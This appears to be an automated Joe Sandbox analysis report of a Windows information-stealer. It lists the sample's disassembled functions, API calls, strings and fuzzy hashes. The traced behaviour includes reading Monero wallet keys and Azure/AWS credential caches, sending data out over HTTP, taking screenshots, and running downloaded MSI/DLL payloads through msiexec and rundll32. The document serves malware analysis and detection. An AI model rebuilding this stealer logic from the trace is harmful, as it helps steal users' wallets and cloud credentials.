                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                      • String ID: "$"$------$------$------
                      • API String ID: 874700897-2180234286
                      • Opcode ID: f6563cfb076bd5d7c27d8aef262fff9bdeb4ae55c451c5895792ff598c36bf02
                      • Instruction ID: 365260d80d2da98c7a1612edda69ea99b6967072a855ae18627984013b030264
                      • Opcode Fuzzy Hash: f6563cfb076bd5d7c27d8aef262fff9bdeb4ae55c451c5895792ff598c36bf02
                      • Instruction Fuzzy Hash: 7212F172960118FAEB15EBA0DC99FEEB37CFF54700F5041A9B10A62091EF782A49CF55
                      Function 0073CEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                        • Part of subcall function 0074A9B0: lstrlen.KERNEL32(?,013E8B50,?,\Monero\wallet.keys,00750E17), ref: 0074A9C5
                        • Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
                        • Part of subcall function 0074A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0074AA12
                        • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,00750E17), ref: 0074A905
                        • Part of subcall function 00748B60: GetSystemTime.KERNEL32(00750E1A,013E9998,007505AE,?,?,007313F9,?,0000001A,00750E1A,00000000,?,013E8B50,?,\Monero\wallet.keys,00750E17), ref: 00748B86
                        • Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
                        • Part of subcall function 0074A920: lstrcat.KERNEL32(00000000), ref: 0074A982
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0073CF83
                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0073D0C7
                      • RtlAllocateHeap.NTDLL(00000000), ref: 0073D0CE
                      • lstrcat.KERNEL32(?,00000000), ref: 0073D208
                      • lstrcat.KERNEL32(?,00751478), ref: 0073D217
                      • lstrcat.KERNEL32(?,00000000), ref: 0073D22A
                      • lstrcat.KERNEL32(?,0075147C), ref: 0073D239
                      • lstrcat.KERNEL32(?,00000000), ref: 0073D24C
                      • lstrcat.KERNEL32(?,00751480), ref: 0073D25B
                      • lstrcat.KERNEL32(?,00000000), ref: 0073D26E
                      • lstrcat.KERNEL32(?,00751484), ref: 0073D27D
                      • lstrcat.KERNEL32(?,00000000), ref: 0073D290
                      • lstrcat.KERNEL32(?,00751488), ref: 0073D29F
                      • lstrcat.KERNEL32(?,00000000), ref: 0073D2B2
                      • lstrcat.KERNEL32(?,0075148C), ref: 0073D2C1
                      • lstrcat.KERNEL32(?,00000000), ref: 0073D2D4
                      • lstrcat.KERNEL32(?,00751490), ref: 0073D2E3
                        • Part of subcall function 0074A820: lstrlen.KERNEL32(00734F05,?,?,00734F05,00750DDE), ref: 0074A82B
                        • Part of subcall function 0074A820: lstrcpy.KERNEL32(00750DDE,00000000), ref: 0074A885
                      • lstrlen.KERNEL32(?), ref: 0073D32A
                      • lstrlen.KERNEL32(?), ref: 0073D339
                        • Part of subcall function 0074AA70: StrCmpCA.SHLWAPI(013E8920,0073A7A7,?,0073A7A7,013E8920), ref: 0074AA8F
                      • DeleteFileA.KERNEL32(00000000), ref: 0073D3B4
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                      • String ID:
                      • API String ID: 1956182324-0
                      • Opcode ID: 00b0459fa4961379b29d4c07e8ddfbd45edb7dcc4d38b9cac136c65c3749d1b5
                      • Instruction ID: 56cb9326eaf07daa83b0e99e6529a9ca9e4780210da69acafca43f75ceab9439
                      • Opcode Fuzzy Hash: 00b0459fa4961379b29d4c07e8ddfbd45edb7dcc4d38b9cac136c65c3749d1b5
                      • Instruction Fuzzy Hash: F2E12D72954108EBEB05EBA0DD9AEEE737CEF54301F104158F106A6092DF39AE49DB62
                      Function 00734880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0074A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0074A7E6
                        • Part of subcall function 007347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00734839
                        • Part of subcall function 007347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00734849
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00734915
                      • StrCmpCA.SHLWAPI(?,013EE290), ref: 0073493A
                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00734ABA
                      • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00750DDB,00000000,?,?,00000000,?,",00000000,?,013EE2B0), ref: 00734DE8
                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00734E04
                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00734E18
                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00734E49
                      • InternetCloseHandle.WININET(00000000), ref: 00734EAD
                      • InternetCloseHandle.WININET(00000000), ref: 00734EC5
                      • HttpOpenRequestA.WININET(00000000,013EE400,?,013EDC28,00000000,00000000,00400100,00000000), ref: 00734B15
                        • Part of subcall function 0074A9B0: lstrlen.KERNEL32(?,013E8B50,?,\Monero\wallet.keys,00750E17), ref: 0074A9C5
                        • Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
                        • Part of subcall function 0074A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0074AA12
                        • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,00750E17), ref: 0074A905
                        • Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
                        • Part of subcall function 0074A920: lstrcat.KERNEL32(00000000), ref: 0074A982
                      • InternetCloseHandle.WININET(00000000), ref: 00734ECF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                      • String ID: "$"$------$------$------
                      • API String ID: 460715078-2180234286
                      • Opcode ID: 9275aac0c489d804e8132c637fe42ce0f1f7441ace76b889bdb74114f22935c7
                      • Instruction ID: c3bca0b6043f1f2044c4e250e854236ff67cb1ce01e1685f9f8b79488d1efed6
                      • Opcode Fuzzy Hash: 9275aac0c489d804e8132c637fe42ce0f1f7441ace76b889bdb74114f22935c7
                      • Instruction Fuzzy Hash: B712BB72950218FAEB15EB90DC96FEEB378BF54304F5141A9B10662091EF782F49CF62
                      Function 0073C990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                        • Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
                        • Part of subcall function 0074A920: lstrcat.KERNEL32(00000000), ref: 0074A982
                        • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,00750E17), ref: 0074A905
                        • Part of subcall function 0074A9B0: lstrlen.KERNEL32(?,013E8B50,?,\Monero\wallet.keys,00750E17), ref: 0074A9C5
                        • Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
                        • Part of subcall function 0074A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0074AA12
                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,013ECFC0,00000000,?,0075144C,00000000,?,?), ref: 0073CA6C
                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0073CA89
                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0073CA95
                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0073CAA8
                      • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0073CAD9
                      • StrStrA.SHLWAPI(?,013ECE28,00750B52), ref: 0073CAF7
                      • StrStrA.SHLWAPI(00000000,013ECEB8), ref: 0073CB1E
                      • StrStrA.SHLWAPI(?,013ED6D8,00000000,?,00751458,00000000,?,00000000,00000000,?,013E89A0,00000000,?,00751454,00000000,?), ref: 0073CCA2
                      • StrStrA.SHLWAPI(00000000,013ED798), ref: 0073CCB9
                        • Part of subcall function 0073C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0073C871
                        • Part of subcall function 0073C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0073C87C
                      • StrStrA.SHLWAPI(?,013ED798,00000000,?,0075145C,00000000,?,00000000,013E8910), ref: 0073CD5A
                      • StrStrA.SHLWAPI(00000000,013E8B20), ref: 0073CD71
                        • Part of subcall function 0073C820: lstrcat.KERNEL32(?,00750B46), ref: 0073C943
                        • Part of subcall function 0073C820: lstrcat.KERNEL32(?,00750B47), ref: 0073C957
                        • Part of subcall function 0073C820: lstrcat.KERNEL32(?,00750B4E), ref: 0073C978
                      • lstrlen.KERNEL32(00000000), ref: 0073CE44
                      • CloseHandle.KERNEL32(00000000), ref: 0073CE9C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                      • String ID:
                      • API String ID: 3744635739-3916222277
                      • Opcode ID: a7c7b35bda7831a47926bc62fb9e8fd46abcf6795233d529ca9841aad043d3d0
                      • Instruction ID: cade60b658811852af1e63d21c2053d69360e946c08a38d19c74dee18c293417
                      • Opcode Fuzzy Hash: a7c7b35bda7831a47926bc62fb9e8fd46abcf6795233d529ca9841aad043d3d0
                      • Instruction Fuzzy Hash: 42E11E72954108FBEB15EBA0DC99FEEB778EF54300F404169F10662191EF386A4ACB62
                      Function 00748320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                      • RegOpenKeyExA.ADVAPI32(00000000,013EB160,00000000,00020019,00000000,007505B6), ref: 007483A4
                      • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00748426
                      • wsprintfA.USER32 ref: 00748459
                      • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0074847B
                      • RegCloseKey.ADVAPI32(00000000), ref: 0074848C
                      • RegCloseKey.ADVAPI32(00000000), ref: 00748499
                        • Part of subcall function 0074A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0074A7E6
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CloseOpenlstrcpy$Enumwsprintf
                      • String ID: - $%s\%s$?
                      • API String ID: 3246050789-3278919252
                      • Opcode ID: fb6b4c6676bfc46e9673ff111ac3046180afed916b7f4005ae193cebc30deb6a
                      • Instruction ID: 3b00029c7c4c66b0ca4b9ba728dec8e25216cd7ddd447b054598f9f0cd3f42bf
                      • Opcode Fuzzy Hash: fb6b4c6676bfc46e9673ff111ac3046180afed916b7f4005ae193cebc30deb6a
                      • Instruction Fuzzy Hash: CA811AB295411CEBEB68DB54CC95FEEB7B8FB48700F008298E109A6180DF756B85CF91
                      Function 00744D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00748DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00748E0B
                      • lstrcat.KERNEL32(?,00000000), ref: 00744DB0
                      • lstrcat.KERNEL32(?,\.azure\), ref: 00744DCD
                        • Part of subcall function 00744910: wsprintfA.USER32 ref: 0074492C
                        • Part of subcall function 00744910: FindFirstFileA.KERNEL32(?,?), ref: 00744943
                      • lstrcat.KERNEL32(?,00000000), ref: 00744E3C
                      • lstrcat.KERNEL32(?,\.aws\), ref: 00744E59
                        • Part of subcall function 00744910: StrCmpCA.SHLWAPI(?,00750FDC), ref: 00744971
                        • Part of subcall function 00744910: StrCmpCA.SHLWAPI(?,00750FE0), ref: 00744987
                        • Part of subcall function 00744910: FindNextFileA.KERNEL32(000000FF,?), ref: 00744B7D
                        • Part of subcall function 00744910: FindClose.KERNEL32(000000FF), ref: 00744B92
                      • lstrcat.KERNEL32(?,00000000), ref: 00744EC8
                      • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00744EE5
                        • Part of subcall function 00744910: wsprintfA.USER32 ref: 007449B0
                        • Part of subcall function 00744910: StrCmpCA.SHLWAPI(?,007508D2), ref: 007449C5
                        • Part of subcall function 00744910: wsprintfA.USER32 ref: 007449E2
                        • Part of subcall function 00744910: PathMatchSpecA.SHLWAPI(?,?), ref: 00744A1E
                        • Part of subcall function 00744910: lstrcat.KERNEL32(?,013EE310), ref: 00744A4A
                        • Part of subcall function 00744910: lstrcat.KERNEL32(?,00750FF8), ref: 00744A5C
                        • Part of subcall function 00744910: lstrcat.KERNEL32(?,?), ref: 00744A70
                        • Part of subcall function 00744910: lstrcat.KERNEL32(?,00750FFC), ref: 00744A82
                        • Part of subcall function 00744910: lstrcat.KERNEL32(?,?), ref: 00744A96
                        • Part of subcall function 00744910: CopyFileA.KERNEL32(?,?,00000001), ref: 00744AAC
                        • Part of subcall function 00744910: DeleteFileA.KERNEL32(?), ref: 00744B31
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                      • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                      • API String ID: 949356159-974132213
                      • Opcode ID: 8ce55d005ffa9005d357dbaf878ae66f6219cd668fa8bfc24d119221ef42fd94
                      • Instruction ID: 1246a9483c87a5517d4c6ce5ead23aa4094c508c25af3acaee9d326f9f120c80
                      • Opcode Fuzzy Hash: 8ce55d005ffa9005d357dbaf878ae66f6219cd668fa8bfc24d119221ef42fd94
                      • Instruction Fuzzy Hash: ED4194BAA54208A7D754F770EC4BFED3338AB64701F404494B649660C2EEF85BCD9B92
                      Function 00749010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                      Download Yara Rule
                      APIs
                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0074906C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CreateGlobalStream
                      • String ID: image/jpeg
                      • API String ID: 2244384528-3785015651
                      • Opcode ID: 3e9e670f9929590dd48c55aa44f74bf69870894802e79c66720c9aa932dad144
                      • Instruction ID: 67da62ca8848b41029d17f28eb471c88b9c6963ad16814e9f0c66d2e59484811
                      • Opcode Fuzzy Hash: 3e9e670f9929590dd48c55aa44f74bf69870894802e79c66720c9aa932dad144
                      • Instruction Fuzzy Hash: BD71E2B2914208EBDB04DFE4DC99FDEB7B9BF88700F108508F615A7290DB78A945DB61
                      Function 00742E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                      • ShellExecuteEx.SHELL32(0000003C), ref: 007431C5
                      • ShellExecuteEx.SHELL32(0000003C), ref: 0074335D
                      • ShellExecuteEx.SHELL32(0000003C), ref: 007434EA
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExecuteShell$lstrcpy
                      • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                      • API String ID: 2507796910-3625054190
                      • Opcode ID: 20bd3e52aaa8424120a207ea98280b5b44538c23b202deebb15cf96535a41016
                      • Instruction ID: c6cbf5cbd1186fff19da2d4ca96103fb293675039461b65d9a86aebdce78d3a9
                      • Opcode Fuzzy Hash: 20bd3e52aaa8424120a207ea98280b5b44538c23b202deebb15cf96535a41016
                      • Instruction Fuzzy Hash: 8E12EE71850108EAEB19FBA0DC96FEDB77CAF14300F504169F50666191EF786B4ACFA2
                      Function 007452C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0074A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0074A7E6
                        • Part of subcall function 00736280: InternetOpenA.WININET(00750DFE,00000001,00000000,00000000,00000000), ref: 007362E1
                        • Part of subcall function 00736280: StrCmpCA.SHLWAPI(?,013EE290), ref: 00736303
